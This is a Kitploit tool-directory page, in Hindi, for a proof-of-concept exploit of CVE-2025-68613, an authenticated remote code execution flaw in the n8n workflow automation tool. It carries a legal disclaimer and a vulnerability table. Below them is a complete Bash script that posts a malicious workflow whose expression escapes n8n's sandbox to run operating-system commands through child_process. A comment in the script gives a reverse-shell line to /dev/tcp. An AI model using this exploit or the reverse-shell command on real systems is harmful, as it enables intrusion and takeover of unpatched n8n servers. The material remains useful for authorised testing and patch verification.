Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613 — CVE-2025-68613 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: एक्सप्रेशन इंजेक्शन के माध्यम से n8n में प्रमाणित रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/mbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubmbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613

n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613

CVE-2025-68613 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: एक्सप्रेशन इंजेक्शन के माध्यम से n8n में प्रमाणित रिमोट कोड निष्पादन

रिपॉजिटरी देखें
228 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

n8n प्रमाणित एक्सप्रेशन इंजेक्शन RCE – CVE-2025-68613

n8n वर्कफ़्लो ऑटोमेशन टूल में गंभीर रिमोट कोड निष्पादन (CVSS 9.9)
प्रूफ़ ऑफ़ कॉन्सेप्ट – केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए


⚠️ महत्वपूर्ण कानूनी चेतावनी

यह कोड केवल शैक्षिक उद्देश्यों और नियंत्रित प्रयोगशाला वातावरण में अधिकृत सुरक्षा परीक्षण के लिए सख्ती से प्रदान किया गया है।

प्रोडक्शन सिस्टम या बिना स्पष्ट लिखित अनुमति के किसी भी सिस्टम पर अनधिकृत उपयोग अवैध है और अधिकांश न्यायक्षेत्रों में कंप्यूटर दुरुपयोग और साइबर सुरक्षा कानूनों का उल्लंघन करता है।

अपने जोखिम पर उपयोग करें। लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है।


भेद्यता जानकारी

फ़ील्डविवरण
एक्सप्लॉइट शीर्षकn8n प्रमाणित एक्सप्रेशन इंजेक्शन रिमोट कोड निष्पादन
CVECVE-2025-68613
प्रकटीकरण तिथि2025-12-25
लेखकMohammed Idrees Banyamer
लेखक का देशJordan
संपर्क / सोशलInstagram: @banyamer_security
GitHubmbanyamer
विक्रेताn8n.io
सॉफ़्टवेयर रिपॉज़िटरीgithub.com/n8n-io/n8n
असुरक्षित संस्करण≥ 0.211.0 < 1.120.4
पैच किए गए संस्करण1.120.4, 1.121.1, 1.122.0 और उससे ऊपर
परीक्षण किया गयाn8n 1.119.3 (Docker)
भेद्यता प्रकारएक्सप्रेशन सैंडबॉक्स एस्केप के माध्यम से प्रमाणित रिमोट कोड निष्पादन
CVSS स्कोर9.9 (गंभीर)

विवरण

यह भेद्यता एक प्रमाणित उपयोगकर्ता को दुर्भावनापूर्ण एक्सप्रेशन का उपयोग करके वर्कफ़्लो बनाने या संशोधित करने की अनुमति देती है, जो n8n के एक्सप्रेशन सैंडबॉक्स को बायपास करते हैं, जिसके परिणामस्वरूप n8n प्रक्रिया के विशेषाधिकारों के साथ पूर्ण ऑपरेटिंग सिस्टम कमांड निष्पादन होता है।


प्रूफ़ ऑफ़ कॉन्सेप्ट – Bash एक्सप्लॉइट स्क्रिप्ट

root@kitploit:~
#!/bin/bash
# Exploit Title: n8n Authenticated Expression Injection RCE
# Date: 2025-12-25
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://n8n.io
# Software Link: https://github.com/n8n-io/n8n
# Version: >=0.211.0 <1.120.4
# Tested on: n8n 1.119.3 (Docker)
# CVE : CVE-2025-68613

TARGET="http://localhost:5678"                  # ← Change to your target
API_KEY="your_n8n_api_key_here"                 # ← Insert valid API Key (or use Basic Auth / session)
CMD="id"                                        # ← Test command
# Example reverse shell: "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

PAYLOAD="{{ (function(){ return this.process.mainModule.require('child_process').execSync('${CMD}').toString() })() }}"

echo "[*] Sending malicious workflow to ${TARGET}"

curl -s -X POST "${TARGET}/rest/workflows" \
  -H "Content-Type: application/json" \
  -H "X-N8N-API-KEY: ${API_KEY}" \
  -d '{
    "name": "CVE-2025-68613 PoC",
    "active": false,
    "nodes": [
      {
        "parameters": {
          "values": {
            "string": [
              {
                "name": "result",
                "value": "'${PAYLOAD}'"
              }
            ]
          }
        },
        "name": "Exploit",
        "type": "n8n-nodes-base.set",
        "typeVersion": 1,
        "position": [460, 300]
      }
    ],
    "connections": {}
  }'

echo -e "\n[!] Check n8n logs or the output node in the created workflow for command result\n"
टूल डाउनलोड करें